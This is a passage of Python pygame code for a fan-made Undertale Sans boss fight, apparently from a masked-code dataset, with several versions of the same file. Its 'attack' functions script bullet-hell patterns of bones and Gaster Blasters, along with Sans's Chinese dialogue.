time2=48, length=1000, type_=1))\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47], speed=[0,\n 5], direction=UP, time1=8, time2=248, length=1000, type_=1))\n\n\n@add_attack\ndef first_round2():\n set_turn_time(50)\n sans.hand_direction = LEFT\n player.type = BLUE_SOUL\n player.direction = LEFT\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake, (player.pos[0] - BOX_POS[0]) // 10))\n tasks.append(Task(unshake, (player.pos[0] - BOX_POS[0]) // 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (player.pos[0] -\n BOX_POS[0]) // 10))\n for y in range(BOX_POS[1], BOX_POS[1] + BOX_SIZE[1], 10):\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, 5],\n direction=LEFT, time1=8, time2=30, length=0, type_=2))\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, 0],\n direction=LEFT, time1=150, time2=38, length=40, type_=2))\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, -5],\n direction=LEFT, time1=8, time2=188, length=40, type_=2))\n\n\n@add_attack\ndef first_round3():\n set_turn_time(450)\n player.type = RED_SOUL\n for _ in range(0, 300, 2):\n bones.append(Bone(pos=BOX_POS, length=40 + sin(_ / 20) * 40,\n direction=UP, speed=[7, 0], time1=1000, time2=_))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] + 25 + sin(_ / 20) * \n 40 + 60], length=1000, direction=UP, speed=[7, 0], time1=1000,\n time2=_))\n\n\n@add_attack\ndef first_round4():\n sans.headtype = SANS_LOOK_LEFT\n sans.say('只是第一个回合而已,何必用尽全力?')\n\n\n@add_attack\ndef first_round5():\n set_turn_time(1)\n sans.headtype = SANS_NORMAL\n pygame.mixer.music.play(-1)\n\n\n<mask token>\n\n\n@add_attack\ndef blue_bone():\n set_turn_time(700)\n global BOX_POS, BOX_SIZE\n BOX_POS = [150, 250]\n BOX_SIZE = [350, 120]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] - 8], length=BOX_SIZE\n [1] - 30 - 16, direction=DOWN, time1=1000, time2=_ * 60 + 60,\n speed=[4, 0], type_=2))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] - 10 - \n 8], length=1000, direction=DOWN, time1=1000, time2=_ * 60 + 60,\n speed=[4, 0], type_=1))\n bones.append(Bone(pos=BOX_POS, length=1000, direction=DOWN, time1=\n 1000, time2=_ * 60 + 60 + 16, speed=[4, 0], type_=1, color=BLUE))\n\n\n<mask token>\n\n\n@add_attack\ndef bone_gap():\n set_turn_time(1000)\n global BOX_POS, BOX_SIZE\n BOX_POS = [150, 230]\n BOX_SIZE = [300, 150]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n x = BOX_POS[0] + random.randint(100, BOX_SIZE[0] - 100)\n bones.append(Bone(pos=[x, BOX_POS[1]], time1=10, time2=_ * 100,\n speed=[0, 0, BOX_SIZE[1] / 10], length=0, direction=DOWN, color\n =BLUE))\n bones.append(Bone(pos=[x, BOX_POS[1]], time1=10, time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[1] / 10], length=BOX_SIZE[1], direction=\n DOWN, color=BLUE))\n tasks.append(Task(shake, _ * 100 + 10))\n tasks.append(Task(unshake, _ * 100 + 15))\n tasks.append(Task(lambda screen: slam_sound.play(), _ * 100 + 15))\n y = BOX_POS[1] + random.randint(70, BOX_SIZE[1] - 30)\n bones.append(Bone(pos=[BOX_POS[0], y], time1=10, time2=_ * 100,\n speed=[0, 0, BOX_SIZE[0] / 10], length=0, direction=RIGHT,\n color=ORANGE))\n bones.append(Bone(pos=[BOX_POS[0], y], time1=10, time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[0] / 10], length=BOX_SIZE[0], direction=\n RIGHT, color=ORANGE))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] - 8], length=y -\n BOX_POS[1] - 16, direction=DOWN, time1=1000, time2=_ * 100 + 60,\n speed=[(x - BOX_POS[0]) / 30, 0], type_=2))\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 8],\n length=y - BOX_POS[1] - 16, direction=DOWN, time1=1000, time2=_ *\n 100 + 60, speed=[-((BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0],\n type_=2))\n bones.append(Bone(pos=[BOX_POS[0], y + 8], length=1000, direction=\n DOWN, time1=1000, time2=_ * 100 + 60, speed=[(x - BOX_POS[0]) /\n 30, 0], type_=1))\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], y + 8], length=\n 1000, direction=DOWN, time1=1000, time2=_ * 100 + 60, speed=[-(\n (BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0], type_=1))\n\n\n<mask token>\n\n\n@add_attack\ndef board_1():\n set_turn_time(10)\n global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n\n\n@add_attack\ndef board_2():\n set_turn_time(600)\n tasks.append(Task(shake, 70))\n tasks.append(Task(unshake, 75))\n blasters.append(GasterBlaster(pos=[10, BOX_POS[1] + BOX_SIZE[1]], angle\n =0, time1=10, time2=70, time3=10, width=70))\n blasters.append(GasterBlaster(pos=[10, BOX_POS[1]], angle=0, time1=10,\n time2=70, time3=10, width=30))\n for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 12):\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 30], length=\n 1000, direction=UP, time1=1000, time2=100, speed=[0, 0], type_=1))\n bones.append(Bone(pos=[x, BOX_POS[1] - 8], length=5, direction=DOWN,\n time1=1000, time2=100, speed=[0, 0], type_=2))\n boards.append(Board(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] - 40],\n length=40, speed=[1, 0], time1=BOX_SIZE[0], time2=100, direction=UP))\n for _ in range(0, 20, 4):\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] +\n BOX_SIZE[1] - 40 - 25], length=1000, direction=UP, time1=\n BOX_SIZE[0] // 4, time2=150 + _ * 30, speed=[-4, 0]))\n\n def start_spinning(screen):\n global spinning_left\n spinning_left = True\n\n def stop_spinning(screen):\n global spinning_left\n spinning_left = False\n tasks.append(Task(start_spinning, 200))\n tasks.append(Task(stop_spinning, 380))\n tasks.append(Task(start_spinning, 500))\n tasks.append(Task(stop_spinning, 680))\n tasks.append(Task(lambda screen: set_screen_angle(0), 682))\n\n\n<mask token>\n\n\n@add_attack\ndef board_4():\n set_turn_time(0)\n bones.clear()\n\n\n<mask token>\n\n\n@add_attack\ndef board_2_1():\n set_turn_time(10)\n global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n\n\n<mask token>\n\n\n@add_attack\ndef bone_lid2():\n set_turn_time(60)\n sans.hand_direction = UP\n player.type = BLUE_SOUL\n player.direction = UP\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake, (player.pos[1] - BOX_POS[1]) // 10))\n tasks.append(Task(unshake, (player.pos[1] - BOX_POS[1]) // 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n bones.append(RotatableBone(pos=[BOX_POS[0] - 20, BOX_POS[1]], time1=\n 1000, length=130, angle=-45, speed=[5, 0, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0] + 20, BOX_POS[\n 1]], time1=1000, length=130, angle=45, speed=[-5, 0, 0, 0]))\n\n\n@add_attack\ndef bone_lid3():\n set_turn_time(1300)\n player.type = RED_SOUL\n for _ in range(20):\n bones.append(RotatableBone(pos=[BOX_POS[0], BOX_POS[1] - 20], time1\n =1000, time2=_ * 60, length=260, angle=-45, speed=[0, 2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1\n ] + 20], time1=1000, time2=_ * 60, length=260, angle=45, speed=\n [0, -2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1\n ] - 20], time1=1000, time2=_ * 60 + 30, length=260, angle=45,\n speed=[0, 2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1\n ] + BOX_SIZE[1] + 20], time1=1000, time2=_ * 60 + 30, length=\n 260, angle=-45, speed=[0, -2, 0, 0]))\n\n\n<mask token>\n\n\n@add_attack\ndef mercy1():\n pygame.mixer.music.pause()\n sans.say('好了,我也累了,不如我们休息一下?')\n\n\n@add_attack\ndef mercy2():\n sans.say('这也是一个改过自新的机会,')\n\n\n@add_attack\ndef mercy3():\n sans.say('赶紧按下饶恕,')\n\n\n<mask token>\n\n\n@add_attack\ndef mercy5():\n set_turn_time(0)\n sans.headtype = SANS_NORMAL\n\n\n<mask token>\n\n\n@add_attack\ndef before_flash():\n sans.say('好吧,看来你已经做出了自己的选择。')\n\n\n<mask token>\n\n\ndef flash_round_2():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n\n def zjj(screen):\n angle = random.randint(-140, -40)\n d = random.randint(10, 200)\n blasters.append(GasterBlaster(pos=[player.pos[0] + math.cos(math.\n radians(angle)) * d, player.pos[1] + math.sin(math.radians(\n angle)) * d], angle=angle - 180, time1=0, time2=20, width=50))\n for _ in range(0, 50):\n tasks.append(Task(zjj, _ / 2))\n\n\ndef flash_round_3():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [200, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0] + BOX_SIZE[0] / 2, 50],\n angle=90, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[50, BOX_POS[1] + BOX_SIZE[1] / 2],\n angle=0, time1=10, time2=70, time3=0, width=60))\n\n\ndef flash_round_4():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0] - 10, BOX_POS[1] - 10],\n angle=45, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] - 10, BOX_POS[1] +\n BOX_SIZE[1] + 10], angle=-45, time1=10, time2=70, time3=0, width=60))\n\n\ndef flash_round_5():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0], 50], angle=90, time1=10,\n time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] + BOX_SIZE[0], 50], angle\n =90, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[50, BOX_POS[1] + 50], angle=0, time1\n =10, time2=70, time3=0, width=100))\n\n\ndef flash_round_6():\n set_turn_time(100)\n global _boxsize, _boxpos, BOX_POS, BOX_SIZE\n BOX_SIZE = _boxsize = [150, 150]\n BOX_POS = _boxpos = [230, 230]\n player.type = RED_SOUL\n player.pos = [BOX_POS[0] + BOX_SIZE[0] / 2, BOX_POS[1] + BOX_SIZE[1] / 2]\n blasters.append(GasterBlaster(pos=[BOX_POS[0], 50], angle=90, time1=10,\n time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[BOX_POS[0] + BOX_SIZE[0], 50], angle\n =90, time1=10, time2=70, time3=0, width=60))\n blasters.append(GasterBlaster(pos=[50, BOX_POS[1] + BOX_SIZE[1] - 50],\n angle=0, time1=10, time2=70, time3=0, width=100))\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef set_turn_time(time):\n\n def next_turn(screen):\n global stop\n stop = False\n tasks.append(Task(next_turn, time))\n\n\ndef add_attack(func):\n attacks.append(func)\n return func\n\n\ndef shake(screen):\n global screen_shaking\n screen_shaking = True\n\n\n<mask token>\n\n\ndef set_screen_angle(angle):\n global screen_angle\n screen_angle = angle\n\n\n<mask token>\n\n\n@add_attack\ndef yinchang_1():\n global BOX_POS, BOX_SIZE\n BOX_POS = [230, 230]\n BOX_SIZE = [170, 160]\n if DEBUG:\n pass\n sans.say('准备好了?')\n\n\n@add_attack\ndef first_round1():\n set_turn_time(50)\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 10):\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 7], speed=[0, \n -5], direction=UP, time1=8, time2=40, length=1000, type_=1))\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47], speed=[0,\n 0], direction=UP, time1=200, time2=48, length=1000, type_=1))\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 47], speed=[0,\n 5], direction=UP, time1=8, time2=248, length=1000, type_=1))\n\n\n@add_attack\ndef first_round2():\n set_turn_time(50)\n sans.hand_direction = LEFT\n player.type = BLUE_SOUL\n player.direction = LEFT\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake, (player.pos[0] - BOX_POS[0]) // 10))\n tasks.append(Task(unshake, (player.pos[0] - BOX_POS[0]) // 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (player.pos[0] -\n BOX_POS[0]) // 10))\n for y in range(BOX_POS[1], BOX_POS[1] + BOX_SIZE[1], 10):\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, 5],\n direction=LEFT, time1=8, time2=30, length=0, type_=2))\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, 0],\n direction=LEFT, time1=150, time2=38, length=40, type_=2))\n bones.append(Bone(pos=[BOX_POS[0] - 7, y], speed=[0, 0, -5],\n direction=LEFT, time1=8, time2=188, length=40, type_=2))\n\n\n@add_attack\ndef first_round3():\n set_turn_time(450)\n player.type = RED_SOUL\n for _ in range(0, 300, 2):\n bones.append(Bone(pos=BOX_POS, length=40 + sin(_ / 20) * 40,\n direction=UP, speed=[7, 0], time1=1000, time2=_))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] + 25 + sin(_ / 20) * \n 40 + 60], length=1000, direction=UP, speed=[7, 0], time1=1000,\n time2=_))\n\n\n@add_attack\ndef first_round4():\n sans.headtype = SANS_LOOK_LEFT\n sans.say('只是第一个回合而已,何必用尽全力?')\n\n\n@add_attack\ndef first_round5():\n set_turn_time(1)\n sans.headtype = SANS_NORMAL\n pygame.mixer.music.play(-1)\n\n\n<mask token>\n\n\n@add_attack\ndef zjj_1():\n set_turn_time(60)\n global BOX_POS, BOX_SIZE\n BOX_POS = [200, 230]\n BOX_SIZE = [200, 150]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n\n\n<mask token>\n\n\n@add_attack\ndef blue_bone():\n set_turn_time(700)\n global BOX_POS, BOX_SIZE\n BOX_POS = [150, 250]\n BOX_SIZE = [350, 120]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] - 8], length=BOX_SIZE\n [1] - 30 - 16, direction=DOWN, time1=1000, time2=_ * 60 + 60,\n speed=[4, 0], type_=2))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] - 10 - \n 8], length=1000, direction=DOWN, time1=1000, time2=_ * 60 + 60,\n speed=[4, 0], type_=1))\n bones.append(Bone(pos=BOX_POS, length=1000, direction=DOWN, time1=\n 1000, time2=_ * 60 + 60 + 16, speed=[4, 0], type_=1, color=BLUE))\n\n\n@add_attack\ndef orange_bone():\n\n def start_spinning(screen):\n global spinning_left\n spinning_left = True\n\n def stop_spinning(screen):\n global spinning_left\n spinning_left = False\n tasks.append(Task(start_spinning, 0))\n tasks.append(Task(stop_spinning, 180))\n tasks.append(Task(lambda screen: set_screen_angle(180), 181))\n tasks.append(Task(start_spinning, 520))\n tasks.append(Task(stop_spinning, 700))\n tasks.append(Task(lambda screen: set_screen_angle(0), 701))\n set_turn_time(700)\n sans.hand_direction = UP\n player.type = BLUE_SOUL\n player.direction = UP\n player.falling_speed = 10\n tasks.append(Task(shake, (player.pos[1] - BOX_POS[1]) // 10))\n tasks.append(Task(unshake, (player.pos[1] - BOX_POS[1]) // 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] - 8], length=10,\n direction=DOWN, time1=1000, time2=_ * 60 + 60, speed=[8, 0],\n type_=2))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] + 30 + 16], length=\n 1000, direction=DOWN, time1=1000, time2=_ * 60 + 60, speed=[8, \n 0], type_=1))\n bones.append(Bone(pos=BOX_POS, length=1000, direction=DOWN, time1=\n 1000, time2=_ * 60 + 60 + 8, speed=[8, 0], type_=1, color=ORANGE))\n\n\n<mask token>\n\n\n@add_attack\ndef bone_gap():\n set_turn_time(1000)\n global BOX_POS, BOX_SIZE\n BOX_POS = [150, 230]\n BOX_SIZE = [300, 150]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n for _ in range(10):\n x = BOX_POS[0] + random.randint(100, BOX_SIZE[0] - 100)\n bones.append(Bone(pos=[x, BOX_POS[1]], time1=10, time2=_ * 100,\n speed=[0, 0, BOX_SIZE[1] / 10], length=0, direction=DOWN, color\n =BLUE))\n bones.append(Bone(pos=[x, BOX_POS[1]], time1=10, time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[1] / 10], length=BOX_SIZE[1], direction=\n DOWN, color=BLUE))\n tasks.append(Task(shake, _ * 100 + 10))\n tasks.append(Task(unshake, _ * 100 + 15))\n tasks.append(Task(lambda screen: slam_sound.play(), _ * 100 + 15))\n y = BOX_POS[1] + random.randint(70, BOX_SIZE[1] - 30)\n bones.append(Bone(pos=[BOX_POS[0], y], time1=10, time2=_ * 100,\n speed=[0, 0, BOX_SIZE[0] / 10], length=0, direction=RIGHT,\n color=ORANGE))\n bones.append(Bone(pos=[BOX_POS[0], y], time1=10, time2=_ * 100 + 10,\n speed=[0, 0, -BOX_SIZE[0] / 10], length=BOX_SIZE[0], direction=\n RIGHT, color=ORANGE))\n bones.append(Bone(pos=[BOX_POS[0], BOX_POS[1] - 8], length=y -\n BOX_POS[1] - 16, direction=DOWN, time1=1000, time2=_ * 100 + 60,\n speed=[(x - BOX_POS[0]) / 30, 0], type_=2))\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] - 8],\n length=y - BOX_POS[1] - 16, direction=DOWN, time1=1000, time2=_ *\n 100 + 60, speed=[-((BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0],\n type_=2))\n bones.append(Bone(pos=[BOX_POS[0], y + 8], length=1000, direction=\n DOWN, time1=1000, time2=_ * 100 + 60, speed=[(x - BOX_POS[0]) /\n 30, 0], type_=1))\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], y + 8], length=\n 1000, direction=DOWN, time1=1000, time2=_ * 100 + 60, speed=[-(\n (BOX_SIZE[0] + BOX_POS[0] - x) / 30), 0], type_=1))\n\n\n<mask token>\n\n\n@add_attack\ndef board_1():\n set_turn_time(10)\n global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n\n\n@add_attack\ndef board_2():\n set_turn_time(600)\n tasks.append(Task(shake, 70))\n tasks.append(Task(unshake, 75))\n blasters.append(GasterBlaster(pos=[10, BOX_POS[1] + BOX_SIZE[1]], angle\n =0, time1=10, time2=70, time3=10, width=70))\n blasters.append(GasterBlaster(pos=[10, BOX_POS[1]], angle=0, time1=10,\n time2=70, time3=10, width=30))\n for x in range(BOX_POS[0], BOX_POS[0] + BOX_SIZE[0], 12):\n bones.append(Bone(pos=[x, BOX_POS[1] + BOX_SIZE[1] - 30], length=\n 1000, direction=UP, time1=1000, time2=100, speed=[0, 0], type_=1))\n bones.append(Bone(pos=[x, BOX_POS[1] - 8], length=5, direction=DOWN,\n time1=1000, time2=100, speed=[0, 0], type_=2))\n boards.append(Board(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1] - 40],\n length=40, speed=[1, 0], time1=BOX_SIZE[0], time2=100, direction=UP))\n for _ in range(0, 20, 4):\n bones.append(Bone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1] +\n BOX_SIZE[1] - 40 - 25], length=1000, direction=UP, time1=\n BOX_SIZE[0] // 4, time2=150 + _ * 30, speed=[-4, 0]))\n\n def start_spinning(screen):\n global spinning_left\n spinning_left = True\n\n def stop_spinning(screen):\n global spinning_left\n spinning_left = False\n tasks.append(Task(start_spinning, 200))\n tasks.append(Task(stop_spinning, 380))\n tasks.append(Task(start_spinning, 500))\n tasks.append(Task(stop_spinning, 680))\n tasks.append(Task(lambda screen: set_screen_angle(0), 682))\n\n\n@add_attack\ndef board_3():\n set_turn_time(100)\n sans.hand_direction = LEFT\n player.type = BLUE_SOUL\n player.direction = LEFT\n player.falling_speed = 10\n tasks.append(Task(shake, (player.pos[0] - BOX_POS[0]) // 10))\n tasks.append(Task(unshake, (player.pos[0] - BOX_POS[0]) // 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (player.pos[0] -\n BOX_POS[0]) // 10))\n tasks.append(Task(shake, 60))\n tasks.append(Task(unshake, 65))\n blasters.append(GasterBlaster(pos=[BOX_POS[0], 10], angle=90, time1=10,\n time2=50, time3=0, width=50))\n\n\n@add_attack\ndef board_4():\n set_turn_time(0)\n bones.clear()\n\n\n<mask token>\n\n\n@add_attack\ndef board_2_1():\n set_turn_time(10)\n global BOX_POS, BOX_SIZE\n BOX_POS = [50, 240]\n BOX_SIZE = [500, 140]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n\n\n<mask token>\n\n\n@add_attack\ndef bone_lid1():\n set_turn_time(70)\n global BOX_SIZE, BOX_POS\n BOX_POS = [200, 240]\n BOX_SIZE = [200, 150]\n sans.hand_direction = DOWN\n player.type = BLUE_SOUL\n player.direction = DOWN\n player.falling_speed = 10\n tasks.append(Task(shake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) // 10))\n tasks.append(Task(unshake, (BOX_POS[1] + BOX_SIZE[1] - player.pos[1]) //\n 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n bones.append(RotatableBone(pos=[BOX_POS[0] - 70, BOX_POS[1] + BOX_SIZE[\n 1]], time1=1000, length=130, angle=45, speed=[5, 0, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0] + 70, BOX_POS[\n 1] + BOX_SIZE[1]], time1=1000, length=130, angle=-45, speed=[-5, 0,\n 0, 0]))\n\n\n@add_attack\ndef bone_lid2():\n set_turn_time(60)\n sans.hand_direction = UP\n player.type = BLUE_SOUL\n player.direction = UP\n player.falling_speed = 10\n player.falling = True\n tasks.append(Task(shake, (player.pos[1] - BOX_POS[1]) // 10))\n tasks.append(Task(unshake, (player.pos[1] - BOX_POS[1]) // 10 + 5))\n tasks.append(Task(lambda screen: slam_sound.play(), (BOX_POS[1] +\n BOX_SIZE[1] - player.pos[1]) // 10))\n bones.append(RotatableBone(pos=[BOX_POS[0] - 20, BOX_POS[1]], time1=\n 1000, length=130, angle=-45, speed=[5, 0, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0] + 20, BOX_POS[\n 1]], time1=1000, length=130, angle=45, speed=[-5, 0, 0, 0]))\n\n\n@add_attack\ndef bone_lid3():\n set_turn_time(1300)\n player.type = RED_SOUL\n for _ in range(20):\n bones.append(RotatableBone(pos=[BOX_POS[0], BOX_POS[1] - 20], time1\n =1000, time2=_ * 60, length=260, angle=-45, speed=[0, 2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0], BOX_POS[1] + BOX_SIZE[1\n ] + 20], time1=1000, time2=_ * 60, length=260, angle=45, speed=\n [0, -2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1\n ] - 20], time1=1000, time2=_ * 60 + 30, length=260, angle=45,\n speed=[0, 2, 0, 0]))\n bones.append(RotatableBone(pos=[BOX_POS[0] + BOX_SIZE[0], BOX_POS[1\n ] + BOX_SIZE[1] + 20], time1=1000, time2=_ * 60 + 30, length=\n 260, angle=-45, speed=[0, -2, 0, 0]))\n\n\n<mask token>\n\n\n@add_attack\ndef mercy1():\n pygame.mixer.music.pause()\n 